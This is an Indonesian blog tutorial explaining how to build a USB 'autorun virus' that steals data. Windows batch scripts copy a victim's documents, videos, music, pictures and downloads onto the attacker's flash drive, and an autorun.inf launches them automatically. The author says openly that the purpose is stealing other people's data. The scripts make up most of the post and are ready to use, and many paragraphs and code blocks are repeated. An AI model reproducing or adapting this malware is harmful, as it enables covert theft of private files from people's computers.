Dalam Pertemuan Kali Ini Saya
Akan Menjelaskan Cara Membuat Autorun Virus Yang Bisa Mencuri Data.
Autorun ini hanya berisi intruksi intruksi untuk mencuri, dan tidak ada intruksi-intruksi yang
sangat berbahaya bagi sistem komputer.
Kalian hanya cukup melakukan copy lalu paste bacth di bawah ini ke notepad.
Untuk Window XP
Autorun ini hanya berisi intruksi intruksi untuk mencuri, dan tidak ada intruksi-intruksi yang
sangat berbahaya bagi sistem komputer.
Kalian hanya cukup melakukan copy lalu paste bacth di bawah ini ke notepad.
Untuk Window XP
@echo
off
:CHECK
if not exist "%&&&&%\Copied_files" md "%&&&&%\Copied_files"
if exist "%systemdrive%\Documents and Settings" goto COPIER
goto ERROR
:COPIER
if not exist "%&&&&%\Copied_files\%computername%" md "%&&&&%\Copied_files\%computername%"
if not exist "%&&&&%\Copied_files\%computername%\VIDEOS" md "%&&&&%\Copied_files\%computername%\VIDEOS"
if not exist "%&&&&%\Copied_files\%computername%\PICTURES" md
"%&&&&%\Copied_files\%computername%\PICTURES"
if not exist "%&&&&%\Copied_files\%computername%\MUSIC" md "%&&&&%\Copied_files\%computername%\MUSIC"
if not exist "%&&&&%\Copied_files\%computername%\DOWNLOADS" md
"%&&&&%\Copied_files\%computername%\DOWNLOADS"
copy /y "%userprofile%\My Documents\*.*" "%&&&&%\Copied_files\%computername%"
copy /y "%userprofile%\My Documents\My Videos" "%&&&&%\Copied_files\%computername%\VIDEOS"
copy /y "%userprofile%\My Documents\My Music" "%&&&&%\Copied_files\%computername%\MUSIC"
copy /y "%userprofile%\My Documents\My Pictures" "%&&&&%\Copied_files\%computername%\PICTURES"
copy /y "%userprofile%\My Documents\Downloads" "%&&&&%\Copied_files\%computername%\DOWNLOADS"
MSG %username% "DONE!"
exit
:ERROR
exit
:CHECK
if not exist "%&&&&%\Copied_files" md "%&&&&%\Copied_files"
if exist "%systemdrive%\Documents and Settings" goto COPIER
goto ERROR
:COPIER
if not exist "%&&&&%\Copied_files\%computername%" md "%&&&&%\Copied_files\%computername%"
if not exist "%&&&&%\Copied_files\%computername%\VIDEOS" md "%&&&&%\Copied_files\%computername%\VIDEOS"
if not exist "%&&&&%\Copied_files\%computername%\PICTURES" md
"%&&&&%\Copied_files\%computername%\PICTURES"
if not exist "%&&&&%\Copied_files\%computername%\MUSIC" md "%&&&&%\Copied_files\%computername%\MUSIC"
if not exist "%&&&&%\Copied_files\%computername%\DOWNLOADS" md
"%&&&&%\Copied_files\%computername%\DOWNLOADS"
copy /y "%userprofile%\My Documents\*.*" "%&&&&%\Copied_files\%computername%"
copy /y "%userprofile%\My Documents\My Videos" "%&&&&%\Copied_files\%computername%\VIDEOS"
copy /y "%userprofile%\My Documents\My Music" "%&&&&%\Copied_files\%computername%\MUSIC"
copy /y "%userprofile%\My Documents\My Pictures" "%&&&&%\Copied_files\%computername%\PICTURES"
copy /y "%userprofile%\My Documents\Downloads" "%&&&&%\Copied_files\%computername%\DOWNLOADS"
MSG %username% "DONE!"
exit
:ERROR
exit
@echo
off
:CHECK
if not exist “%&&&&%\Copied_files” md “%&&&&%\Copied_files”
if exist “%systemdrive%\files” goto COPIER7
goto ERROR
:COPIER7
if not exist “%&&&&%\Copied_files\%computername%” md “%&&&&%\Copied_files\%computername%”
if not exist “%&&&&%\Copied_files\%computername%\VIDEOS” md “%&&&&%\Copied_files\%computername%\VIDEOS”
if not exist “%&&&&%\Copied_files\%computername%\PICTURES” md
“%&&&&%\Copied_files\%computername%\PICTURES”
if not exist “%&&&&%\Copied_files\%computername%\MUSIC” md “%&&&&%\Copied_files\%computername%\MUSIC”
if not exist “%&&&&%\Copied_files\%computername%\DOWNLOADS” md
“%&&&&%\Copied_files\%computername%\DOWNLOADS”
copy /y “%userprofile%\Documents\*.*” “%&&&&%\Copied_files\%computername%”
copy /y “%userprofile%\Videos” “%&&&&%\Copied_files\%computername%\VIDEOS”
copy /y “%userprofile%\Music” “%&&&&%\Copied_files\%computername%\MUSIC”
copy /y “%userprofile%\Pictures” “%&&&&%\Copied_files\%computername%\PICTURES”
copy /y “%userprofile%\Downloads” “%&&&&%\Copied_files\%computername%\DOWNLOADS”
MSG %username% “DONE!”
exit
:ERROR
exit
:CHECK
if not exist “%&&&&%\Copied_files” md “%&&&&%\Copied_files”
if exist “%systemdrive%\files” goto COPIER7
goto ERROR
:COPIER7
if not exist “%&&&&%\Copied_files\%computername%” md “%&&&&%\Copied_files\%computername%”
if not exist “%&&&&%\Copied_files\%computername%\VIDEOS” md “%&&&&%\Copied_files\%computername%\VIDEOS”
if not exist “%&&&&%\Copied_files\%computername%\PICTURES” md
“%&&&&%\Copied_files\%computername%\PICTURES”
if not exist “%&&&&%\Copied_files\%computername%\MUSIC” md “%&&&&%\Copied_files\%computername%\MUSIC”
if not exist “%&&&&%\Copied_files\%computername%\DOWNLOADS” md
“%&&&&%\Copied_files\%computername%\DOWNLOADS”
copy /y “%userprofile%\Documents\*.*” “%&&&&%\Copied_files\%computername%”
copy /y “%userprofile%\Videos” “%&&&&%\Copied_files\%computername%\VIDEOS”
copy /y “%userprofile%\Music” “%&&&&%\Copied_files\%computername%\MUSIC”
copy /y “%userprofile%\Pictures” “%&&&&%\Copied_files\%computername%\PICTURES”
copy /y “%userprofile%\Downloads” “%&&&&%\Copied_files\%computername%\DOWNLOADS”
MSG %username% “DONE!”
exit
:ERROR
exit
Sesudah
batch di atas di copi ke notepad ,, ganti simbol &&&& dengan
nama flashdisk yang akan digunakan untuk mencuri data , Misalkan : Removable
Disk (default name sebuah flashdisk)
jika semua simbol &&&& sudah di ganti dengan nama flashdisk anda , save dengan format .Bat
jangan lakukan save dengan format .txt
contoh, maling.bat
Selanjutnya buka lagi notepad.
copi paste dibawah ini ke notepad,
jika semua simbol &&&& sudah di ganti dengan nama flashdisk anda , save dengan format .Bat
jangan lakukan save dengan format .txt
contoh, maling.bat
Selanjutnya buka lagi notepad.
copi paste dibawah ini ke notepad,
[autorun]
Open=&&&&.bat
Action=File Copier
Open=&&&&.bat
Action=File Copier
ganti &&&& dengan
nama file batch yg telah anda buat ,
Contoh :
maling
jika sudah save dengan nama :
autorun.inf
Finaly,
Pindahkan file autorun.inf dan maling.bat ke flashdisk anda,
dan anda siap mencuri data milik orang lain n_n , bila virus tidak berjalan otomatis tinggal doubleklik maling.bat dan data komputer orang lain pun tercuri.
Contoh :
maling
jika sudah save dengan nama :
autorun.inf
Finaly,
Pindahkan file autorun.inf dan maling.bat ke flashdisk anda,
dan anda siap mencuri data milik orang lain n_n , bila virus tidak berjalan otomatis tinggal doubleklik maling.bat dan data komputer orang lain pun tercuri.
You Can Copying-Pasting In Blog. .
But Do not Forget to Leave your comments here on this blog progress and pr for me. .
Thank's . . !!
Done And Hopefully Helpful .
F397_AWH
But Do not Forget to Leave your comments here on this blog progress and pr for me. .
Thank's . . !!
Done And Hopefully Helpful .
F397_AWH
0 komentar:
Posting Komentar